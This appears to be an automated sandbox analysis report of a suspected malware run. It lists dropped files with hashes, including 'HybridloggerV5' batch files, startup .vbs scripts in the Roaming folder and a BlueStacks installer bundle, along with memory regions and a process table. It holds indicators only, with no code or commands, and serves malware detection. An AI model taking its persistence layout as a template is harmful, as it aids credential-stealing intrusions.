db1b2ac48b1ae25fff5c8b5b07fed8bc477aec9462236321faffe37cb48c46eb81234b2f2283e6d9d29d8f7309849ea0525f1bd53bf7eeaca4c73141bbe94d27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
04d6eaa80acb96aa4e051788a13bde8c

SHA1
d9e29b3ddf0548c86b8f9186257bca2b752ac440

SHA256
1ad5c54282ed9ea28c75f642c74f93f4d364bba19668ec67eba9bd4c7be7b75d

SHA512
4d08d2d7f93c420202e438d8a89762e3381318b64e04c171f018b7ccc23faa3cee39ddf51166042104af101e0abfdb19d6eb19c0978c78e3a1fe124695541106

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d4e990c51d4eeb9d81acd0cd163a9635

SHA1
6653ab19da834e26f3bfb8c671aa2d3a1aae0545

SHA256
ff3f805e1e65a062e0cd33c41078df71ef592cbdff7462142cdee9c9d449be20

SHA512
5813449786d3b06905821d802734b09f0cf0e5f308f4304a6ba594df80b0e8380f2113c97fbfe4f6be8072a66c2e3977612107c87610ede60ab164f485080776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
6964587ba9644a9cc894428e50868135

SHA1
e402ce242aa81113bc98b6758b0b3bd2978e49a9

SHA256
750f47c1719832f29abd8cf80eadbc516e8e149b9113504ccb7bda528cbeb298

SHA512
75c15407eb992bc8fe889277741f4e14f843fd71a14588739638acd8dec2766cea77be69eb0783f0cd6c07c0162ff547f657f28be6b2dec14be7e1e7148f17fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b70340032c505fa174dc2ff8fa1039e3

SHA1
a806c38e6d279e6eac112d9a419c709a1b19dac1

SHA256
da0a46b32405802b183765ab132668512ef169f2e19f699b67d0af2563bc4b8c

SHA512
bcfea972842326d155debaca9f9793cea60468c2ec1309f8bb7c9ae9bf63f1b39fcf435fdc774c5927e6c7e93a5ae5e2de48465bc5932134106dfc73a771ebc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
a6029a677f6f253ede75d1c4c761514d

SHA1
8b65a5f42cb1242c4a84e48cbfca2dea2a96d1b8

SHA256
91e9b279bf9ae13bb58ba6659cc8d94b9d733c6bf5e049bf1072a18450aff5ff

SHA512
0b72a7aa76cf3a47fb4d2b487d01ade6e66501a28a591094794b56d44c20dfd003e6ec03805e5d22712a56debb5ae1d97a80cb44aab2ec700adbe158f2477c90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe583469.TMP

Filesize
535B

MD5
5af3c4e297f9cd1f8d7926ac4fa2f120

SHA1
6bb08857a21aa01e74146f1c6c90ca0d9c90ac1d

SHA256
d1831322e0cb48475068e705f9c6294133fae52f7547e7ca1c6ab948c51c3820

SHA512
a0184ef6cce0e49d97a5d4c2eb2720d2cb48cd7c6deacdfd4506b17f657f7691bef9e992757c5478bf8792ddaa4273b1831e48a849a34c4276dc234621a877ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
46630d7dc7eeee3fd4e4db509432c527

SHA1
3399a3e3bbe14cf88571a6e8f70c5f243e48d262

SHA256
5e9bc94bec27fd22f24cfdcb0ced0f3ff12c1cd6e158bdbbd0917a2d712bcafe

SHA512
b0ede0344b5422032acec5ca5748c8ef814ff1ce28c2f1057e84b91ad5c490401b82bc577ecb26d79bacca333ed27a1463cbecf0a0f3d32d69c34f030d81f139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
631cfd966663138594ef22355f108019

SHA1
a8f88d445a1881364b071e4f7271f1aaf24d1df8

SHA256
7d651c5fc84e3e2f26ec1ea00a6a88d5bb4bff1fba35ca8e6e8b2a199b5176bb

SHA512
12f98bdf8f050710ba55d840f83f27f81616fc80c5b81d481692d638a388097b89d22768f0fd62e8709cd54009a7c41a7ca09124190eadeee6196b5ecfd6c78a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
49fc160f507accd4b96882544c737161

SHA1
9020008f823b7311d0677bc7f83bde68fcca472e

SHA256
ce382346ebe52eb2e6052d041ee128eddd1d30b9635f42aa80448cc0d22ce403

SHA512
cf6b6322d30567a921e8501813d8c573b1469f3db4440784b88769b6248a0339e924314c463830947fcd74fc7ccaee3d056851dd2ff00d46d365aa421983707a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5aae4e3735abf049ecdf7808831acf2a

SHA1
907de8a3aa61ec8946c4e86aa74e93ac1eaa5f87

SHA256
40f20094d236d917fb3a13c1d3f8b7f9fd1f9ad60d302f17ef3e6822f4aee28a

SHA512
b6984e08aa44a82449b7da7e553c34ae8fd5406d10fc4f52b2966abc3f8409d60f723dc66cce1ecf21abae868c9890d355e972d757f5eb88f4b716b5427611ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ac4debfeac3cbdabaacb69d17ed6d094

SHA1
37c65092c0048856ff920e280517bc3ae93c1622

SHA256
17ce1363ffd2efbbec7285a60a8764be4bc0591a20d62e84a56b175493ee6eb6

SHA512
cc7c4ca256de2880bd625ddcd3d80b9a8dd86566233019617a9eedda7996796d7d7d09e97f1372b861e022f8f2e5208723f78d88dbd6cfcace4c27e0de4c14b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6236e94d952a753d93b0f73950dbbd2

SHA1
0214009ea654e1f4aa52a6973909c2e15d6b36c4

SHA256
edd3bbc09d536fe003b5c600814156006506571d4ff5495095c5a2a28b349a13

SHA512
05384d64d887ec029f3d6e8fb93ac9c90edb0f42e239545f815b07caa2641d1fee5a1ab4842235ad9cbadb864c11855ac7fc439ef1c1270507c3c479416c7957

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6ed6547d270ec2a3219183bfa73bc09b

SHA1
efbcbdbdccab903a79b2b0a65d882eca8bb81363

SHA256
f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

SHA512
d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4fc204cd72f2c3f6149d487b16ea4a83

SHA1
ac5f7fae2c1ac704ad559069589844a89c0b7410

SHA256
dc706e6f21d6e4b670e36f3ed9772fef5f47d30af28f587f14ccd2f6348d14d8

SHA512
d6e90367ab4efcc2364ac7ad18763ba79b3f5ac638cefd1ec651bee9e9b6d3753b24e41bf774ce400024f1befd3b33e33fc89f0ec836e8e8256a39719a303ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\backicon.png

Filesize
15KB

MD5
7ff5dc8270b5fa7ef6c4a1420bd67a7f

SHA1
b224300372feaa97d882ca2552b227c0f2ef4e3e

SHA256
fa64884054171515e97b78aaa1aad1ec5baa9d1daf9c682e0b3fb4a41a9cb1c1

SHA512
f0d5a842a01b99f189f3d46ab59d2c388a974951b042b25bbce54a15f5a3f386984d19cfca22ba1440eebd79260066a37dfeff6cb0d1332fca136add14488eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\change_click.png

Filesize
310B

MD5
57092634754fc26e5515e3ed5ca7d461

SHA1
3ae4d01db9d6bba535f5292298502193dfc02710

SHA256
8e5847487da148ebb3ea029cc92165afd215cdc08f7122271e13eb37f94e6dc1

SHA512
553baf9967847292c8e9249dc3b1d55069f51c79f4d1d3832a0036e79691f433a3ce8296a68c774b5797caf7000037637ce61b8365885d2a4eed3ff0730e5e2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\close_red.png

Filesize
15KB

MD5
93216b2f9d66d423b3e1311c0573332d

SHA1
5efaebec5f20f91f164f80d1e36f98c9ddaff805

SHA256
d0b6d143642d356b40c47459a996131a344cade6bb86158f1b74693426b09bfb

SHA512
922a7292de627c5e637818556d25d9842a88e89f2b198885835925679500dfd44a1e25ce79e521e63c4f84a6b0bd6bf98e46143ad8cee80ecdbaf3d3bc0f3a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\close_red_click.png

Filesize
15KB

MD5
6db7460b73a6641c7621d0a6203a0a90

SHA1
d39b488b96f3e5b5fe93ee3eecb6d28bb5b03cf3

SHA256
d5a7e6fc5e92e0b29a4f65625030447f3379b4e3ac4bed051a0646a7932ce0cd

SHA512
a0e6911853f51d73605e8f1a61442391fad25ff7b50a3f84d140d510fd98e262c971f130fb8a237a63704b8162c24b8440a5f235f51a5c343389f64e67c1c852

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\close_red_hover.png

Filesize
15KB

MD5
5ceab43aa527bc146f9453a1586ddf03

SHA1
88ffb3cadccb54d4be3aabf31cf4d64210b5f553

SHA256
7c625ae4668cc03e37e4ffc478b87eace06b49b77e71e3209f431c23d98acdd0

SHA512
8a5c81c048fb7d02b246ed23a098ae5f95cdf6f4ca58fd3d30e4fe3001c933444310ca6391096cfaeed86b13f568236f84df4ea9a3d205c0677e31025616f19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\custom.png

Filesize
17KB

MD5
03b17f0b1c067826b0fcc6746cced2cb

SHA1
e07e4434e10df4d6c81b55fceb6eca2281362477

SHA256
fbece8bb5f4dfa55dcfbf41151b10608af807b9477e99acf0940954a11e68f7b

SHA512
67c78ec01e20e9c8d9cdbba665bb2fd2bb150356f30b88d3d400bbdb0ae92010f5d7bcb683dcf6f895722a9151d8e669d8bef913eb6e728ba56bb02f264573b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\installer_bg.jpg

Filesize
78KB

MD5
3478e24ba1dd52c80a0ff0d43828b6b5

SHA1
b5b13bbf3fb645efb81d3562296599e76a2abac0

SHA256
4c7471c986e16de0cd451be27d4b3171e595fe2916b4b3bf7ca52df6ec368904

SHA512
5c8c9cc76d6dbc7ce482d0d1b6c2f3d48a7a510cd9ed01c191328763e1bccb56daeb3d18c33a9b10ac7c9780127007aa13799fa82d838de27fbe0a02ad98119d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\installer_logo.png

Filesize
14KB

MD5
e33432b5d6dafb8b58f161cf38b8f177

SHA1
d7f520887ce1bfa0a1abd49c5a7b215c24cbbf6a

SHA256
9f3104493216c1fa114ff935d23e3e41c7c3511792a30b10a40b507936c0d183

SHA512
520dc99f3176117ebc28da5ef5439b132486ef67d02fa17f28b7eab0c59db0fa99566e44c0ca7bb75c9e7bd5244e4a23d87611a55c841c6f9c9776e457fb1cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\installer_minimize.png

Filesize
113B

MD5
38b539a1e4229738e5c196eedb4eb225

SHA1
f027b08dce77c47aaed75a28a2fce218ff8c936c

SHA256
a064f417e3c2b8f3121a14bbded268b2cdf635706880b7006f931de31476bbc2

SHA512
2ce433689a94fae454ef65e0e9ec33657b89718bbb5a038bf32950f6d68722803922f3a427278bad432395a1716523e589463fcce4279dc2a895fd77434821cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\loader.png

Filesize
279B

MD5
03903fd42ed2ee3cb014f0f3b410bcb4

SHA1
762a95240607fe8a304867a46bc2d677f494f5c2

SHA256
076263cc65f9824f4f82eb6beaa594d1df90218a2ee21664cf209181557e04b1

SHA512
8b0e717268590e5287c07598a06d89220c5e9a33cd1c29c55f8720321f4b3efc869d20c61fcc892e13188d77f0fdc4c73a2ee6dece174bf876fcc3a6c5683857

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Assets\setpath.png

Filesize
15KB

MD5
b2e7f40179744c74fded932e829cb12a

SHA1
a0059ab8158a497d2cf583a292b13f87326ec3f0

SHA256
5bbb2f41f9f3a805986c3c88a639bcc22d90067d4b8de9f1e21e3cf9e5c1766b

SHA512
b95b7ebdb4a74639276eaa5c055fd8d9431e2f58a5f7c57303f7cf22e8b599f6f2a7852074cf71b19b49eb31cc9bf2509aedf41d608981d116e49a00030c797c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\BlueStacksInstaller.exe

Filesize
627KB

MD5
f7d42d16b2415767bb51b38df46650d3

SHA1
cd6e7d6617abf98c6fef8203c69ea838e92b515b

SHA256
ac0686ea443da65d97875c7398487b813d3827f5423160a25219614fb58e152a

SHA512
06f4a0439c29c73f29685c24626050503e46c530a53b69c669ea6412228f66a3ecb09aab5b2b379cc330fec38fe3a1f0ba8ea26064bbf7a4b806ce1ddfe1cb29

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\BlueStacksInstaller.exe.config

Filesize
324B

MD5
1b456d88546e29f4f007cd0bf1025703

SHA1
e5c444fcfe5baf2ef71c1813afc3f2c1100cab86

SHA256
d6d316584b63bb0d670a42f88b8f84e0de0db4275f1a342084dc383ebeb278eb

SHA512
c545e416c841b8786e4589fc9ca2b732b16cdd759813ec03f558332f2436f165ec1ad2fbc65012b5709fa19ff1e8396639c17bfad150cabeb51328a39ea556e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\HD-CheckCpu.exe

Filesize
200KB

MD5
81234fd9895897b8d1f5e6772a1b38d0

SHA1
80b2fec4a85ed90c4db2f09b63bd8f37038db0d3

SHA256
2e14887f3432b4a313442247fc669f891dbdad7ef1a2d371466a2afa88074a4c

SHA512
4c924d6524dc2c7d834bfc1a0d98b21753a7bf1e94b1c2c6650f755e6f265512d3a963bc7bc745351f79f547add57c37e29ba9270707edbf62b60df3a541bc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\JSON.dll

Filesize
411KB

MD5
f5fd966e29f5c359f78cb61a571d1be4

SHA1
a55e7ed593b4bc7a77586da0f1223cfd9d51a233

SHA256
d2c8d26f95f55431e632c8581154db7c19547b656380e051194a9d2583dd2156

SHA512
d99e6fe250bb106257f86135938635f6e7ad689b2c11a96bb274f4c4c5e9a85cfacba40122dbc953f77b5d33d886c6af30bff821f10945e15b21a24b66f6c8be

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\Locales\i18n.en-US.txt

Filesize
20KB

MD5
a1e3293265a273080e68501ffdb9c2fc

SHA1
add264c4a560ce5803ca7b19263f8cd3ed6f68f0

SHA256
1cb847f640d0b2b363ce3c44872c4227656e8d2f1b4a5217603a62d802f0581f

SHA512
cb61083dc4d7d86f855a4cc3fe7c4938232a55188ad08b028a12445675fbff6188bb40638bd1ce4e6077f5bfc94449c145118c8f9b8929d4e9c47ed74cf7bece

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\ThemeFile

Filesize
80KB

MD5
c3e6bab4f92ee40b9453821136878993

SHA1
94493a6b3dfb3135e5775b7d3be227659856fbc4

SHA256
de1a2e6b560e036da5ea6b042e29e81a5bfcf67dde89670c332fc5199e811ba6

SHA512
a64b6b06b3a0f3591892b60e59699682700f4018b898efe55d6bd5fb417965a55027671c58092d1eb7e21c2dbac42bc68dfb8c70468d98bed45a8cff0e945895

Download Submit
C:\Users\Admin\AppData\Local\Temp\BlueStacksMicroInstaller_5.21.550.1031.log_bst

Filesize
7KB

MD5
9778000644f03d05d90a8e41e55807a1

SHA1
48acee6672ef550b3f589f6debe35f4801e800b5

SHA256
f21ad922a8ec64e063350b2a272ce82a05612f9f19f7059ad29bb1f4bb688c82

SHA512
a5ff5a769a373c6de49571daead23ca893334f31977d7707e93d86a54bbd7fa9a0b579991309d5661424a4f958b5c2f6ed83d25f7dd4df2526d003c3228f1210

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33ux5vhj.go2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
a7eb9e031934b455d409535e42a39706

SHA1
b958c2c029274e5a682a3c6246ff4cbb57f7de3a

SHA256
d3f6383eba82de99957a01bc0deb9b10e256914a06f7f4f0e86e18a58d441aeb

SHA512
e7f22a414fced0b352c8597ff6d35dc36f4cec3e92f890c730032d305d4918f5b5d574b982ee37cb6fdbdb356bc912c617ab9b47edae692610890f6361836cae

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_334.vbs

Filesize
115B

MD5
24c7af433b8a5127b679964343181505

SHA1
57bedc4d405eed838f67a880fb22e9e921979589

SHA256
badbe5b3ed31eb7b68cdcf1d45a0750726410b72dddd696a9b87be41cf36a23f

SHA512
ae45c43d23d87b71bba02b28bab466cd91e767335f21e4d49b21a9705b26f9bc5b5288dbb9bc1d4a6081cbbc346bd170ab5a85613a2907dce6d816978f15f0ed

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_726.vbs

Filesize
115B

MD5
d951dc340b9b0b73e44bd63153df2e85

SHA1
906340e4a4d2e0b2c5724932c8dd67e9bf2a28d3

SHA256
9fb64af217533a6e431f6c37a40114c086336afe98ff0e2b9f4a0b7039675d76

SHA512
422e28c588521a34708b344df04fc6a1c0e473bbf97dc2a76d126497bb96e710cf341c88afa2af09145c44081c6a564bf944327cf987ea418d1a0621dcb42b0b

Download Submit
C:\Users\Admin\Downloads\HybridloggerV5.5.exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 163728.crdownload

Filesize
9.9MB

MD5
1b8ee61ddcfd1d425821d76ea54ca829

SHA1
f8daf2bea3d4a6bfc99455d69c3754054de3baa5

SHA256
dc0826657a005009f43bdc3a0933d08352f8b22b2b9b961697a2db6e9913e871

SHA512
75ba16ddc75564e84f5d248326908065942ad50631ec30d7952069caee15b8c5411a8802d25d38e9d80e042f1dde97a0326f4ab4f1c90f8e4b81396ca69c229a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 4659.crdownload

Filesize
937KB

MD5
c9314841cdbf8522e9ee925039d3bfb7

SHA1
1b851459626862fdae6bdc0dd30aadf7a0f905ee

SHA256
9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

SHA512
fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

Download Submit
\??\pipe\LOCAL\crashpad_3512_AJGBJKVUFTZLXIYG

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1400-880-0x00000128DE690000-0x00000128DE69C000-memory.dmp

Filesize
48KB

Download
memory/1400-1155-0x00000128DEC30000-0x00000128DECE0000-memory.dmp

Filesize
704KB

Download
memory/1400-1026-0x00000128DEB10000-0x00000128DEC30000-memory.dmp

Filesize
1.1MB

Download
memory/1400-784-0x00000128DE4B0000-0x00000128DE4C6000-memory.dmp

Filesize
88KB

Download
memory/1400-959-0x00000128C6090000-0x00000128C609E000-memory.dmp

Filesize
56KB

Download
memory/1552-737-0x000001EB804F0000-0x000001EB80528000-memory.dmp

Filesize
224KB

Download
memory/1552-734-0x000001EB804C0000-0x000001EB804C8000-memory.dmp

Filesize
32KB

Download
memory/1552-730-0x000001EBFFFA0000-0x000001EBFFFC2000-memory.dmp

Filesize
136KB

Download
memory/1920-1551-0x00007FF79AAD0000-0x00007FF79BD49000-memory.dmp

Filesize
18.5MB

Download
memory/3132-140-0x000000001C290000-0x000000001C2C8000-memory.dmp

Filesize
224KB

Download
memory/3132-134-0x00007FFA34AB0000-0x00007FFA35572000-memory.dmp

Filesize
10.8MB

Download
memory/3132-135-0x000000001CCF0000-0x000000001D218000-memory.dmp

Filesize
5.2MB

Download
memory/3132-129-0x00007FFA34AB0000-0x00007FFA35572000-memory.dmp

Filesize
10.8MB

Download
memory/3132-128-0x000000001B800000-0x000000001B868000-memory.dmp

Filesize
416KB

Download
memory/3132-138-0x00007FFA34AB0000-0x00007FFA35572000-memory.dmp

Filesize
10.8MB

Download
memory/3132-141-0x000000001C260000-0x000000001C26E000-memory.dmp

Filesize
56KB

Download
memory/3132-126-0x0000000000A70000-0x0000000000B10000-memory.dmp

Filesize
640KB

Download
memory/3132-124-0x00007FFA34AB3000-0x00007FFA34AB5000-memory.dmp

Filesize
8KB

Download
memory/3132-150-0x0000000002CA0000-0x0000000002CA8000-memory.dmp

Filesize
32KB

Download
memory/3132-178-0x00007FFA34AB0000-0x00007FFA35572000-memory.dmp

Filesize
10.8MB

Download
memory/4792-715-0x0000000000E10000-0x0000000000F00000-memory.dmp

Filesize
960KB

Download

pid	process
3132	BlueStacksInstaller.exe
2928	HD-CheckCpu.exe
5060	HD-CheckCpu.exe
4792	HybridloggerV5.5.exe
3708	HybridloggerV5.5.exe
1920	VencordInstaller.exe